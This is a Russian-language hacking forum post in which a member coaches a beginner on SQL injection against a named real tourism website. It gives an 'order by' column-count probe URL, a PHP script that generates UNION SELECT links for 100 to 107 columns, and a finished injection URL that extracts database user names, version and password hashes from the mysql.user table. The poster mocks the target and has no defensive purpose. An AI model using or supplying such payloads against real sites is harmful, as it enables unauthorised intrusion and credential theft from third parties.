|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
С нами:
9361826
Репутация:
115
|
|
Сообщение от Buddah
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской
Код:
<?php
for ($i=100; $i<108; $i++) {
echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";
for ($j=1; $j<=$i; $j++) {
echo $j;
if ($j!=$i) echo ",";
};
echo "/*'>$i</a><br>";
}
?>
Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:
Код:
SELECT * FROM EVENT LEFT JOIN REGION ON
(E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE
ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN
BUNDESLAND ON
(E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE
E_ID=99999999
107!!! полей выборки, из которых нужны макс 20, бедный сервак.
Ну и как результат
Код:
http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/*
Даже не закрыт доступ к db mysql...
|